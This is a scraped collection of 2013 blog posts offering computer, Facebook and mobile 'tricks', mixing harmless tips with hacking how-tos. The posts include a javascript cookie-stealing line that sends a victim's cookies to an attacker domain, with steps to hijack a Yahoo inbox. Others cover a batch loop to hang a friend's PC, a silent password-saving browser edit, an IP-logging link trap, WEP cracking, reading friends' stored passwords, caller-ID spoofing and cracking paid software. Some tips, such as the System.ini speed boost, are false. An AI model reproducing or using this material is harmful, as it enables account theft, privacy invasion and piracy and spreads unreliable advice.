Transfer your all Facebook Friends To Google Plus eRecently Google launched his awaited brand new social networking site called Google+ . The Google plus v/s Facebook is the hot topic among the tech bloggers. Facebook already cross the one million users. Google want to capture the market share of social networking through google plus after orkut. Now the question is, If I am user of google plus, how can i connect with my friends which is available only in facebook? Can i transfer my facebook friends to Google plus? The answer is yes, you can transfer your all Facebook Friends To Google Plus.To export all your friends to facebook try Facebook Friend Exporter Chrome extension in google chrome.Follow below instruction to transfer your friends to google plus. Make sure you are logged into m.facebook.com , you must be logged in for it to work. Must have English version of Facebook for this to work (you can switch) Do not enable SSL for Facebook use HTTP not HTTPS If you need any help running this, contact me. Commenting below will be lost. An “Export” button will appear on Facebooks toolbar after refresh once installed. Please disable all Facebook Extensions that you have downloaded, many of them affect the page. For example “Better Facebook” breaks this extension. This extension will allow you to get your friends information that they shared to you: - Name - Emails - Phone numbers - Screen names - Websites - Address - Birthdays Two methods of exports CSV file (if you have many friends, greater than 500, it will be very slow) Gmail Contacts ( It will place them into a folder called “Imported from Facebook “) Notice: Your contacts will be cached, so don’t worry, you will continue where you left off. This extension states “ Browsing History” permission, this is needed to transfer data from Facebook Tab to the extension. Your history absolutely doesn’t get exported, it uses OAuth for authentication, so only the user logged in OAuth can get that data.

make prank call

Make prank calls call spoofing If you want to fool your friends or want to see the demo of call spoofing, i have a better call spoofing service. It has many services. You can do prank calls, spoof caller id, change your voice during call. When you call someone he will see the number which you want him to see. This service is easy to use. follow these steps: 1. Select the country you are calling from, choose the CallerID you want to display and enter the number you want to call. 2. Press "Get me a code" and we will provide you with number to call and a code. 3. Call the number 4. Enter the code and we will connect your call to your friend with the CallerID and voice you have selected. Warning: Do not use this for any crime. click to use this service here: http://www.crazycall.net/

restrict access folder using cmd

Restrict Access to folder/file using cmd You may have seen may software to lock the folder/files and you may also have seen batch programs to do the same. Today I am going to share with you a Basic Dos Command which will help you to Restrict Access to Folder/File . The only thing you need for this is the Administrator Access on Windows Machine. Follow the Below Given Steps to restrict access: 1.) Open Command Prompt in Windows 2.) Type the Following Command : cacls "" /E /P everyone:n For example: calcs "C:\users \Administrator\Desktop\Lock.txt" / E /P everyone :n 3.) Remember that path of file/folder should be in double quotes (""). You will get the following message on Success "Processed File: C:\users \Administrator\Desktop\Lock.txt" 4.) Now when you try to open the File/Folder You will get the message "Access is denied" . Now to Unlock Folder/File and to give it the full access, follow below given steps: 1.) Open Command Prompt in Windows 2.) Type the Following Command : cacls "" /E /P everyone:f For example: calcs "C:\users \Administrator\Desktop\Lock.txt" / E /P everyone :f 3.) Remember that path of file/folder should be in double quotes (""). You will get the following message on Success "Processed File: C:\users \Administrator\Desktop\Lock.txt" 4.) You have successfully unlocked the file/folder

colour chat on Facebook

Below is the list for all the alphabets . Just copy the alphabets one by one , inserting a space between every alphabet. [[107015582669715]] = A [[116067591741123]] = B [[115602405121532]] = C [[112542438763744]] = D [[115430438474268]] = E [[109225112442557]] = F [[111532845537326]] = G [[111356865552629]] = H [[109294689102123]] = I [[126362660720793]] = J [[116651741681944]] = K [[115807951764667]] = L [[106596672714242]] = M [[108634132504932]] = N [[116564658357124]] = O [[111669128857397]] = P [[107061805996548]] = Q [[106699962703083]] = R [[115927268419031]] = S [[112669162092780]] = T [[108983579135532]] = U [[107023745999320]] = V [[106678406038354]] = W [[116740548336581]] = X [[112416755444217]] = Y [[165724910215]] = Z

hack Firefox auto save password

Hack Firefox to autosave password without notificationThis is a featured page Step To Do This Firefox Hack 1) First you need to close firefox. 2) Now locate the nsloginmanagerprompter.js which is normally found in C:\ProgramFiles\MozillaFirefox \Components\ 3) Open nsloginmanagerprompter.js with notepad ++ 4) Replace the entire line 804 to 869 with the following code var pwmgr = this._pwmgr;pwmgr.addLogin(aLogin) ; When you've done that "save as" to your desktop, then drag back in to the original folder and replace the file. To see the usernames + passwords you need to click on tools at the top of your browser and go to page info then security. They will be saved into the saved passwords section. Enjoy And donot forget to comment

how to get hanged your friend pc

The easiest way to get your friends PC hanged! To hang windows explorer: Get access to your friend's PC Or try it yourself Open Notepad (Start > All Programs > Accessories > Notepad). Copy the following code and paste it in notepad. @echo off :A start goto:A From the Menu bar, click on File > Save As. The Save As dialog box opens. Under the Save as type select All Files option. Write a desired name for your file, for example hang.bat [Remember to give a .bat extension to your file name]. Now Open the hang.bat file and see the computer getting hanged!

how to break hidden password

How To Break Password Behind The Stars Ever wanted to know what is behind those ******** passwords. For example if you want to know password from facebook account that somebody else have typed and left it. Here is post which will help you. . 1)How to break hidden passwords ******** in firefox This is simple. Just copy and paste the following javascript code when in your address bar whenever you are on a site with a login form and it will display the password behind ****** right away. Javascript Code : javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k

change start menu name

Change Start Menu with just One- Click I really was fred up of the different ways to change the name of Start Menu. But finally found out a way to do that easily. Below is a Software that directly changes the name of your Start Menu. download the software utility. You just have to put your name in New Label and you're done. Enjoy your Start Menu. $$$$$$$$$$

use keyboard as mouse

Use Keyboard As Mouse Looking cool computer tricks? Here is something that should pique your interest: Use Keyboard As Mouse, On Screen Keyboard and Transform your Windows XP in to Windows 7. When mouse isn’t working properly , this trick can be very helpful. To activate mouse keys all you do is press Alt+Left shift key + NumLock and click OK or press enter . Use the Numerical pad for controlling the mouse pointer. 5 is for click. + is for double click - for right click. On screen keyboard is one of the coolest windows features that displays a virtual keyboard on the computer screen that allows people with mobility impairments to type data by using a pointing device or joystick.. To use it go to start-> run and type osk Use Keyboard As Mouse

how to hack college routers

Open all block sites Hello, Here now available a super dupper web browser..... now hack the college router ... 1. Open all the block sites like all social sites facebook,orkut,twitter, omegle ,youtube etc. . 2.Hide your identity with changing your ip address automatically.. just download TOR BROWSER .. and enjoy it..... click below to download tor browser.... DownloadTor Browser Bundle https:// www.torproject.org/download/ download-easy.html.en

how to transfer balance

Balance Transfer Tricks For All Mobile Networks. Here Are Working Balance Transfer Tricks For All Mobile Networks. Airtel : To Transfer Balance In Airtel Just Dial *141# And Follow The Onscreen Instructions. You Can Transfer From 5 To 30 Rupees Of Balance In Airtel. Tata Docomo : To Transfer Balance In Tata Docomo SMS as BT MobileNumber Amount And Send It To 54321. E.g. BT 9876543210 30 To Transfer 30 Rupees Of Balance. !dea : To Transfer Balance In !dea Network Send SMS as GIVE MobileNumber Amount And Send It To 55567. E.g. GIVE 9876543210 30 To Transfer 30 Rupees. Vodafone : To Transfer Balance In Vodafone Dial *131*Amount*Mobile No# E.g. *131*50*9876543210# To Transfer 50 Rupees Of Balance. Uninor : To Transfer Balance In Uninor Just Dial *202*MobileNumber*Amount# E.g. *202*9876543210*30# To Transfer 30 Rupees. Aircel : To Transfer Balance In Aircel Just Dial *122*666# And Follow The Instructions. You Can Transfer 10,20 Or 100 Rupees Of Balance. BSNL : To Transfer Balance In BSNL Just Send SMS GIFT MobileNumber Amount To 53733. E.g. GIFT 9876543210 50 To Transfer 50 Rupees Of Balance

send password protected email

Send password protected emails If you have to send some confidental information like credit card numbers,Bank details etc it may not be secure to send it without any encryption and password protection.Hackers can use sniffers to intercept your email messages or they can retrieve the data after hacking email accounts.To protect yourself from such situations you can use Lockibin which provides password protection and AES-256 bit encryption to your emails. Click here to go LockBin online service. Fill the form with your desired password. In the text filled write your message. You can also attach a file if you want. After this, click on Submit button. Now your password protected mail will be sent. ( Receiver will only get a link to your password protected and encrypted emai l) When receiver clicks on that link it will prompt to enter the password otherwise it will not be open. That’s it! But you have to send password to your friend which can be sent on Mobile number or you can send a normal Email for it.The password protected email is stored in lockbin server itself.

LATEST 2013 RELIANCE HACK TRICK || 1GB FREE 3G DATA

1) Goto this link.http:// www.rcom.co.in/rcom/rworld/ music/mobileCallerUser_ screen1.jsp?plan=postMobileNet 2) Fill ur mobile no. And name. And submit it. 3) U will get Pin code on ur mobile. 4) Fill this Pin code and mob no. Not on above link but any of the following links... For 99rs. Packhttp://rcom.co.in/ rcom/rworld/music/ MobileAuthentication.jsp? AppID=109&plan=postMobileNet +99 and for 29rs. Gprs pack http:// rcom.co.in/rcom/rworld/music/ MobileAuthentication.jsp? AppID=111&plan=postMobileNet +99 and click submit. DONE... By this way u successfully hack reliance Gprs pack. Note: Deactivate ur previous 99rs. Bundle pack before doing this. Enjoy... NOTE: 1) If it ask for std code then add 0 in front of ur mobile no. 2) To deactivate ur previous 99rs pack then call 155223 and enter code 2084 ENJOY...........

HOW TO VIEW UR PROFILE VISITERS

HOW TO VIEW UR PROFILE VISITERS Now right click and select “View Page Source” (or simply clickCtrl + U ). A new tab will open which is full of codes. Press Ctrl + F or F3 from your keyboard. And a new search bar will open at the top right corner.Search for the following text without the quotes : -“ ordered_list.top_friends “The above text would be highlighted and just below the highlighted word you will find a set of numbers.Yeah ! You guessed it right ! Those are the profile ID’s of the people who viewed your facebook profile. The ID’s are in a sequence – the first one being the guy who viewed your facebook profile most numberof time – followed by the others. The last ID in the sequence visits your account very rarely !Ofcourse with those ID’s you won’t be able toguess who actually are they ! So now copy that profile ID. Go to Facebook.com and paste it after adding a “ / “.So your final URL is :-www.facebook.com/ProfileIDLets take for examplewww.facebook.com/100001053506025

HOW TO OPEN MULTIPLE facebook ACCOUNT IN GOOGLE CHROME ??

HOW TO OPEN MULTIPLE facebook ACCOUNT IN GOOGLE CHROME ?? LET SEE GUYS !!! Just press ctrl+shift+N A cognito window will open ...yeahhhhhh :v now u can njoy with multiple account in multiple cognito window !!! :)

how to access content without registration

How to access content without registration !!! To access any type of content whichrequires registrationyou need an username and password of that particular website,it is obvious that you need to register to get an username and password.visit this site http://www.bugmenot.com/ It will provide you fake and workinguser-names and passwords in a sec....so you can save your time without registeration by accessing contents of any websitenjoy guys !!!!

HOW TO BLOCK ADS IN CHROME AND FIREFOX

HOW TO BLOCK ADS IN CHROME AND FIREFOX [SPEED UP YOUR BROWSER BY FILTERING ADS ] 1. AdThwart is a Chrome extension. 2. Firefox AdBlock Plus filter engineto block ads in your favourite browser. you can choose from a number of filter lists, including the good-known EasyList or elsesubscribe to any other AdBlock PlusFilter list. The updates are automatic to this extension, which makes it easy to maintain.As you can see there is a smiling caticon in the browser address barwhen this feature is enabled. You can easily add sites to the filter.You can just disable this extension,as easy as clicking the cat icon in the address bar.Once you uncheck the box saying Enabled for this site,you’ll be able to see the ads again.

Saturday 10 August 2013

hack Facebook chat history

Hack Facebook Chat History There is a simpe easy Trick to Hack Facebook Chat History. We can HackChat History even if our Friends areOffline. To use this Trick follow the simple steps given below : 1) Open Friends profile. 2) Right Click on the Poke and Select Copy Link Location. Now we have the ID in our Clipboard. 3) This will exactly look like :http://www.facebook.com/profile.php?id=XYZ( where XYX can be any numbers and this XYZ is nothing but the ID ). 4) Now in the Address Bar type"javascript:Chat.openTab(XYZ)" (without qoutes) and press Enter. 5) Now it is done. 6) You can see full Chat History now.So this is a simple Trick to Hack Facebook Chat History.

how to get friend's ip address using Facebook

How to Get Friend's IPAddress from Facebook Facebook is now a popular wayto communicate with eachother from all over the world.Sometimes we also want toidentify the person whom weare speaking with, this onlycan be done by knowing his/herIP Address. Getting IP Addressfrom Facebook Chat isn't easy,what we are going to show youis PHP script that you'll host ona free webhosting site thensend the link and retrieve theIP Address.How to Get Friend's IP Addressfrom Facebook Chat Step 1 (Creating PHP File)1) Create a new text documentand edit it.2) Write the following PHP codeinside it:3) Replace "ztuts.com" with anyother link (picture link...)4) Save that as : anything.php(e.g: ip.php) Step 2 ( Webhosting )You can Signup for an accountin any Free webhosting service1) Go to x10hosting2) Signup for an account( choose a right domain namee.g : razor.x10.mx )3) After creating an account onx10hosting, go to the FileManager and open the public_html directory4) Click Upload, and select thePHP file that you created onStep1.4 (ip.php)5) Select all permissions fromRead/Write/Execute (777) Step 3 (Get IP Address )After setting up an account anduploading the .PHP File, it'stime to get IP Address ofany Friend on Facebook 1) Go to the domain that youcreated in Step2.2 in myexample razor.x10.mx 2) You'll see the PHP file thatyou created, right click>CopyAddress Link 3) The link will be somethinglike this : yourdomain.x10.mx/anything.phpIn our example it willbe: razor.x10.mx/ip.php 4) Send that link to any of yourfriends, after he/she clicks onthe link, he/she will beredirected to the link that youreplaced in step1.3 (in myexample : ztuts.com ) 5) Go to your domain nameagain like step1 (e.g:razor.x10.mx) 6) You'll see a new textdocument named ip_log.txt 7) Click that file, you'll get all IPAddresses of your friends thataccessed that link.Done! Now you can track theirIP Location using IP Tracer

how to hack wifi

HOW TO HACK WIFI USING A PC.?? This post is dedicated to all lazy ppl like me who dont wanna surf our page to solve their problems.What u need is 2 softwares : (1 ) Comview. (2) Aircrack ng 1.0 (for windows) Step 1 : Download n install both software, wat u need now is to capture packets usin Comview for WiFi, packets r data dat is been sentback n forth frm d owners pc n d wifi adapter. Step 2 : Play comview, it'll 1st scan all d channels dat r available. Step 3 : Click capture once the desired wifi is found. Step 4 : Save all d data packets in d dump format, once u have enough data packets .Step 5 : Now open up d aircrack-ng gui.exe, for d aircrack menu. Step 6 : Open d folder wer u hav saved all ur packets n launch d aircrack ng gui.if u fail, it means dat u stil dont havenough packets.. so capture more .Step 7 : Just wait for d password to be decrypted.And use the details to login n enjoy internet .Download links : (1 ) Comview for wifi :http://www.tamos.com/download/main/ca.php (2) Aircrack ng 1.0 (for windows) -http://www.tamos.com/download/main/ca.php

how to reset android lock code in emergency

How to Unlock/Reset a AndroidLock in Emergency :1) First of all, you need to swichoff your android device and keep itfor some time .2) Now press the up volumebutton and hold it for 30 seconds. 3) Now press home button andhold it, Then press power buttonand after started your phone justrelease it. 4) Then you can see enter secretandroid menu you never see itbefore, just click on home buttonup and down in the menu. 5) Now click on third option whichis Delete All User Data. 6) Now in this way, your androidlock pattern is unlocked nowproblem is solved if you face any problem commentbelow, Hit like for more android trick

some abbreviation related to internet

Important abbreviations related to internet : FM – Frequency Modulation SIM – Subscriber Identity Module RIM – Removable Identity Module... GSM – Global System For Mobile LAN – Local Area Network WAN – Wide Area Network RTF – Rich Text Format MAN – Metropolitan Area Network URL – Uniform Resource Locator ISP – Inter Net Service Provide@– At The Rate Of DVD – Digital Versatile Disk CD – Compact Disk EDGE – Enhanced Data for GSM Evolution GPRS – General Packet Radio Service FDM – Frequency Division Multiplexing SDR – Software Defined Radio ATM – Asynchronous Transfer Mode DCA – Dynamic Channel Allocation FCA – Fixed Channel Allocation AMPS – Advance Mobile Phone System IMTS – Improved Mobile TelephoneSystem CDMA – Code Division Multiple Access MTSO – Mobile Telephone SwitchingOffice HTTP – Hypertext Transfer Protocol FIDI – Fiber Distributed Data Interface ISDN – Integrated Services Digital Network PSTN – Public Switched Telephone Network CSMA – Carrier Sense Multiple Access RADAR – Radio Detection AndRanging SONET – Synchronous Optical Fiber Network DAMPS – Digital Advanced Mobile Phone System WWW – World Wide Web IP – Internet Protocol TCP – Transmission Control Protocol HTML – HyperText Markup Language USB – Universal Serial Bus PAN - Personal Area Network TDM - Time Division Multiplexing.

how to install android on pc

Installing Android(JellyBeen) On Pc/Laptop Things You Needed:- 1.Oracle VM VirtualBox 2.Android x86 4.2 ImageInstructions: 1.Install VirtualBox on your PC 2.Open VirtualBox and select New. In the dialog box enter the name asyour wish and selecti)Type : Linuxii)Version : Other Linux and select Next 3.In the next dialog box enter the memory size as your wishNote:-Minimum 512Mb required for JellyBeanand select Next 4.In the next dialog box select create a virtual hard drive now. Then select VDI and select fixed ordynamically allocated as your wish and create thevirtual drive 5.Select Virtual device and select settings, a dialog box appears. In the dialog box select i)Storage->Storage Tree->Emptyii)In the attributes section select the Android 4.2 iso file you downloaded and checkLive Cd/Dvd, then click Ok 6.Then start the virtual device. In the screen select Install Android-x86 to hard disk. 7.In the next screen select Create/Modify Partition. 8.Then create a new primary bootable partition and select write. After finishing writing select quit. 9.Then install android in sda1 and select type as ext3 , choose yes for installing grub. 10.After installing remove live iso from VirtualBox and reboot. Now you can boot into Android 4.2.2

how to fast shutdown my system

Very simple tip to fastly shut downyour computer! WNDOWS 7 users!: Press WINDOWS key(do not hold) then 2 times press TAB key(do nothold)Then press ENTER and see whathappens!!!Do it a lil fast! WINDOWS XP USERS!: Press WINDOWS KEYThen press U key two timesThen see!hit like and share if its worked

Tuesday 30 July 2013

how to change Facebook password without know old password

go to this link. https://www.facebook.com/checkpoint/checkpointme?f=113194692112762&r=web_hacked

how to see lock profile pic on fb

1.Visit Facebook.com. 2.Now open any profile that is locked and you want its profile pic to be enlarged. 3.Now just right click on the profile pic and click onCopy image URL. .4.Now you are going to get some URL like below. https://fbcdn-profile-a.akamaihd.net/hprofile-ak-ash3/c40.39.495.495/s160x160/550659_590311350997597_2018327603_n.jpg. 5.Now just remove thes160x160/part from the above URL and hit enter .6.Or just modify thats160x160 to s720x720it will enlarge image. 7.Now you are going to see the large size of that small locked image. 8.So its that easy now whenever you come across any locked profile, just follow this same steps to see the enlarged version of that image.How To View Locked Profile Picture In Facebook Do comment if any problem or like post tweet to your friends ask any question.

Saturday 27 July 2013

get 5000 friends on Facebook in a week

Add 5000 MASS Facebook FriendsIn this tutorial i will tell you how to add 5000 friends on your facebook friend list on facebook. All the emails that i have providedare real facebook users that use facebook daily. if you want your email to be added in the list. Comment your email. we will add your facebook email too.This is so simple trick Step 1.Download the 5000 email list. STEP 2.Copy all the Emails and paste into the invite friends tool.http://www.facebook.com/invite.php STEP 3.Then click on "Invite Your Friends" button. you're done now. you will get 5000 friends in less than 7 days. more emails more friends, so keep sharing. .Extra:If you want to promote yourbusiness. You can also copy all the emails and send an email to them.This Email will go to their email + in their facebook inbox too! If you want us to add your email Put it in a comment! Thanks for email list go to our page on Facebook and like us https://www.facebook.com/pages/Best-Blog/180530035425421

boost YouTube speed new tricks

TRICK TO BOOST BUFFERING SPEED OF YOUTUBETODAY IM GOING TO TEACH YOU HOW TO BOOST UP THE BUFFERINGSPEED OF YOUTUBE . THIS ARTICLE WILL BE MORE HELP FULL TO THE PEOPLE WITH SLOW INTERNET Step 1:Type : "System.ini" in Run. press ok.Step 2:A new notepad file will open Step 3:Copy paste the below code in that notepad file.page buffer=1000000Tbps load=1000000Tbps Download=100000Tbps save=1000000Tbps back=1000000Tbps search=1000000Tbps sound=1000000Tbps webcam=1000000Tbps voice=1000000Tbps faxmodemfast=1000000Tbps update=1000000Tbps Step 4:All the steps a completedNOW SAVE THE FILE AND RESTART THE COMPUTERRESTARTING THE COMPUTER IS MOST IMPORTANT FOR THE CHANGES TO TAKE PLACE IN PCAfter that open youtube and you will see the difference.

transform your image into Facebook chat smile

Transform Your Image Into Facebook Chat Smileys Are you bored with the old facebook chat smileys? Do you wantto create your own chat code for a new, cute and cool smiley in facebook? If yes, then you are at right place. In this tutorial we will learn how to create your own facebook chat code for a smiley in just 3 steps. You can use some smileys by some computer keyboard shortcut keys but here wewill create our own chat code for the smileys for free.You just have to select a picture from your computer then upload it and get a chat code for your own smiley in the facebook. I bet you that your friends will be asking you about it when you will use your own custom facebook smileys in the chat or will post the cool smileys on their status.How to create your own fb smileys chat code:-1.) Go toSmileychat codes.2.) Click onChoose Fileoption and select the image, from your computer, which you want to convert into smiley.3.) Now click onUpload nowoption and wait for the chat code. Once your chat code is generated, use it in yourfacebookaccount and impress your friends .KEEP SUPPORTING BY COMMENTING AND SHARING :)

how to crack idm

IDM 6.11 BUILD 8 WITH CRACK 1 download idm with from 2 after download file extract rar folder 3 rar folder contains 3 files a. idm.exe b. idm611.exe c. read first.txt 4 install idm611.exe then STEP TO CRACK IDM 1. install idman611.exe 2.now copy idm.exe and paste to (for 64 bit pc) C:\Program Files (x86)\Internet Download Manager (for 32 bit pc) C:\Program Files\Internet Download Manager {{{{ ie.=>> open c drive=>>then open program files(x86)=>> then open internet download manager folder =>> now paste idm.exe in folder=>> choose copy and replace }}}}} enjoy with cracked idm . note:- don't update idm. {when (after few day of installation) idm pop up a update notification then simply close that pop up window}

Friday 26 July 2013

how to create con folder

CON FolderHi guys, do u knw dat it is not possible to create a folder by name 'CON' (there are few others also i guess) as we create folders easily by any name. But if you want to create a folder by name CON, here's how u do it-Rename folder from the right click option.....Now press alt and press 255...OR alt and 0160press 255 frm the right sideof the key bords i.e., num padnow write con and then press enter,you ll see a con folder in ur pcIf ur cd drive is not shown in my computer then dont worry followthe step:1) Close all open programs2) Click on Start, Run, and type REGEDIT and press Enter3) Click on the plus signs (+) next to the following folders• HKEY_LOCAL_MACHINE• SYSTEM• CurrentControlSet• Control• Class• {4D36E965-E325-11CE-BFC1-08002BE10318}4) This folder is the DVD/CD-ROM Drive Class Description in the registry. Look for any of the following names in the right hand column.• UpperFilters• LowerFilters• UpperFilters.bak• LowerFilters.bak5) If any of the above keys shown in step 4 are listed, right-click on them and choose Delete6) After deleting the keys, close the RegistryEditor7) Reboot your computer8) Open My Computer and check to see if your CD or DVD drives have returned. You may also want to open Device Manager and verify that the yellow exclamation and error code on the CD or DVD drive is gone

how to make stylish Facebook

Trick To Install/Change Themes on Facebook with StylishOrkut gives you the option to change your profile theme but world’s most popular social networking website doesn’t provide you the ability to change theme of your profile.Now I am giving you something more i.e Trick to /Change themes on facebook and 45 beautiful facebook themes.If you are using facebook colour changer script then disable it from greasemonkey before using this Facebook theme trick.This trick has following requirementsMozzilla firefox browserStylish AddonSo here is the complete tutorial on how to install themes on facebook1. Open firefox browser.If you donot have you can download ithere2. Now Download Stylish addon for firefox by clickinghere.3. After installation is complete restart your browser4. Install Any of the themes below by clicking on the image5. To switch between the themes you have installed on your firefox browser gotoTools>Addons>Stylishand disable all

hack wifi by ultimate method

HACK WIFI PASSWORD IN WINDOWSFIRSTLY WE KNOW ABOUT HOW TO HACK WIFI PASSWORD AND WHAT TOOL ARE REQUIRED TO HACK WIFI PASSWORDTOOL REQUIRED FOR WIFI HACKING1. COMMVIEW FOR WIFI :-this tool is used for capturing the packet of wifi which we have to crack.this is also used for convert the file which is required for crack ( in this crack we convert .ncf file to .cap file)you can use this link to download this software2. AIRCRACK -NG :-this tool is used for retrieve password from captured file from commview for wifi softwareto download software STEP TO HACK WIFI NETWORK IN WINDOW:-1. install commview2. after installation a popup window is open in commview software for driver installation .( ifpop window not open then goto > help > driver installation guide then do this)3. install commview driver for your wifi network( without installation of driver you cannot capture data of desired wifi network)4. after installation of driver click on capture button on left corner ofsoftware.5. a pop up window is open and show wifi network near you.6. select wifi network which you want to hack and click on capture.you must need to see your connection is wep or not.(this trick only work with wep)7. after that you can see the commview capture wifi data.8. now goto to logging panel in commview and tick on auto saving and putmaximum directory size, mb - 2000average log file size- 209. now capture packets for 2-3 hour.( about 1 lakh packet)STEP TO CONVERT CAPTURED FILE.open commview and follow step1. goto file>log viewer2. after open log viewer3.goto file> load commview log> select all capture file > then open4. after opening goto>export logs> select wireshark tcpdump format5. save file with desired location (this file is used for cracking password)CRACK PASSWORD USING AIRCRACK-NG:-1. open download package.2. goto bin and open aircrack-ng GUI.exe3. open converted file4. select key size - 645. click on launch6. index no. of target file is-- 17 wait for cracking password8. if wifi password is cracked then it writepassword 100% decerypted 94:13:26:54:66in this password is 9413265466 forwifiIF NOT CRACKED IN FIRST ATTEMPT1. if password is not cracked then it say FAILED NEXT TRY WITH 5000 IVS.2. so we have to again capture packets and repeat above process again till password is crack.NOTE:-when we again capture packet and convert it into cap then we have to select all previous captured packet also to convert.

Thursday 25 July 2013

how to lock drive

>>Locking Drives:We don’t usually prefer to lock our drives, but sometimes it becomes nesscary. Say for instance you might have stored your office documents in D:\ and you don’t want your kids to access it, in such case this technique can be useful for you. Please don’t try this tweak with your root drive (usually C:\ is the root drive) since root drives arenot intended to be locked because they are mandatory for the system and application programs.*.Start&Runand typeRegeditto open Registry editor*.BrowseHKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer*.Create a newDWORDvalueNoViewOnDriveand set its value as2^ (Alpha Number of Drive Letter-1) where Alpha number are simple counting of alphabets from A to Z as 1 - 26For example: to lock C:\, Alpha number of C is3 so 2^ (3-1) = 4(decimal value)*.Tolock more drives, calculate thevalue of each drive and then set sum of those numbers as value*.Tounlock your drivejustdelete the keyfrom the registry.

how to lock any folder

>>Locking Folders:*.Consider you want to lock a folder namedXXXXin your E:\, whose path is E:\XXXX.*.Now open the Notepad and type the following[code]ren xxxx xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D}[/code]*.Where xxxx is your folder name. Save the text file asloc.batin the same drive.*.Open another new notepad text file and type the following[code]ren xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D} xxxx[/code]*.Save the text file askey.batin thesame drive.Steps to lock the folder:*.To lock thexxxxfolder, simply click theloc.batand it will transform into control panel icon which is inaccessible.*.To unlock the folder click thekey.batfile. Thus the folder will be unlocked and the contents are accessible.

Wednesday 24 July 2013

post status or comment in blue colour text

Now i share how to post blue colour text in facebook.follow the StepsStep1:Login to your Facebook Account.Step2:Now Go to your Status Update or any comment.step3:paste the Below Code in your Status Bar or comment box.@[1: ]@@[1:[0:1: Your TextHere ]]step4:then delete "your text here" and write your own text.step5:after writing your own text then press enter.Now you will see the text in blue colour. Share to your friends and write your comment.

download video from YouTube using uc browse

How to Download Youtube Videos through Ucweb browser?if you want to download the youtube videos?There is a simple trick to downloadyoutube videos via uc browser.in my lost post i share thefree youtube downloadernow i share download youtube videos for uc browser1.Open m.youtube.com and search any video.2.Then, move the cursor on that video's text not on video's image.3.then, press 1.4.It will display a menu. In this menu click on page info.5.now it display the two url.copy the second url.6.Then, open a new website.-online convert.com7.select video covert in this website.8.Then select any format i.e. 3gp,mp4.Then press go.9.paste the your youtube url in urlfield.10.now..It will start coverting.Then you have to wait 2 or 3 minutes.11.after waiting press "click here to refresh the status manually".now Your download link will appear..or another option is you put your email address on email field then the video download link was send to your email address.method 2: go to this siteyaayain this site are copy of the youtube.com. Additionaly this sitehave a downloading option.search any video like youtube then Download it.

send application using Bluetooth

now follow the steps to send a .jar application via bluetooth.1. first download any uc browser2.then browse and search any application and press download.3.now uc browser ask to yousaveorinstall4. just select save and download it5.after downloading close the browser and open your game or application.but this application are"not support" because this extension are _jar (not a .jar)for example it looks likeyour application_jarso this formate are correct to send via bluetooth between two devices.6.now send this application to any device via bluetooth7.after receiving the application just renameyour application_jartoyour application.jarthats all now the application works well in other mobile and you can send it to many mobile but the extension should be _jar.share this post if any problem then comment here...

download YouTube video from YouTube

downloading youtube videos in opera mini.follow the steps.1.open your opera mini.2.then go to m.youtube.com3. Then select bookmarks(#5) in your opera mini.4.select add bookmark and name it "youtube download"5. Then delete the address and paste the bellow javascript.6.save the bookmark.7.then select any video in youtube(click only on videos text not on image)8.after selecting video scroll down to bottom and select desktop view or classic view.9.Now go to your browser settings and off the "single column view".10.now browser ask to you reload the page-> press yes.11.after reloading the page select your "youtube download" bookmark. (#5 is a shortcut of opera mini 6 and higher versions)when you selecting your bookmarkthe page was automatically reloaded and the download option is appear in the bellow of video.12.press download and select any format like 3gp, mp4 etc.now the video is downloading.if any problem then comment here.

how to see stored password in uc browser

follow the steps to see the stored password in uc browser:1.go to any login page where the password are stored.2.move the cursor(arrow) to password field and dont click it.3.then press #5(quick Search)thats all now your stored passwordare displayed in your search engine.this same trick are used to view your friends facebook password or any other sites password.share this post.if any problem then comment here.and also tell me this trick areworked or not?

email hacking

Do U Think If Your Email Can Not Been Hackable, Then You Are Wrong...Ur Email-ID Can Be Hack... But Its Can Be Hack Only Fault by User.. Most Of The Peoples Think That Their Has A Software to Hack A Email- ID's But Truth Is Their Is No Software Present For Hacking Ur Mail ID's..Email Hacking can be possible to many ways like:-1. Social Engineering2.Phishing Attacks3. Cookie Hijacking4. By KeyloggersSocial Engineering:This Process is defined as Hack the human mind without any tools...This has become one of the hottest topics today and it seems to work out most of the times. Social Engineering doesn’t deal with the network security issues, vulnerabilities, exploits,etc. It just deals with simple Psychological tricks that help to get the information we want.This really works!! But it requires a lot of patience.We are all talking about network security and fixing the vulnerabilities in networks.But what happens if some internal person of a network accidentally gives out the passwords. After allwe are all humans; we are also vulnerable and can be easilyexploited and compromised than the computers.Social Engineering attacks have become most common during the chat sessions.With the increase in use of Instant Messengers, any anonymous person may have achat with another any where in the world. The most crucial part of this attack is towin the trust of the victim.Phishing Attack:The act of sending an e-mail to a user falsely claiming to be an established legitimate enterprise inan attempt to scam the user into surroundering private information that will be used for identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the user’s information.Cookie Hijacking:In cookie hijacking we can hack email accounts very easily.. This trick is verydangereous because whenever user change a password then there is no need toattacker for again hack Email- ID ofvictim.Andit would take you to inbox of victim's yahoo account without asking for any password of victim account.Keyloggers:Keylogger is a software program or hardware device that is used to monitor and logeach of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Becausethese programs and hardware devices monitor the keys typed in auser can easilyfind user passwords and other information a user may not wish others to know about.Keyloggers, as a surveillance tool, are often used by employers to ensure employeesuse work computers for business purposes only. Unfortunately, keyloggers can alsobe embedded in spyware allowing your information to be transmittedto an unknown third party.Cookie Hijacking:U Can Hack Yahoo Account by Cookies Stealing or Hijacking From Browser.Follow Steps and Learn it.This is very Simple Tutorial and 100% Tested..!!..Step 1: Download the Script on given linkhttp://www.multiupload.com/9Q3EPTOO47Step:2 Download and extract files into your hard drive.Step:3 Create a account in any ftp hosting site i suggestedwww.t35.comStep4: Login to your account and upload 4 files into your ftp account.Step5: Give this code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.Stolen cookies get stored in directory 'cookies'javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));He would again redirected to his yahoo account.Step6. Open the hacked.php . The password is 'hoc'.You must have got the username ofvictim's account. Simply Click on it and it would take you to inbox 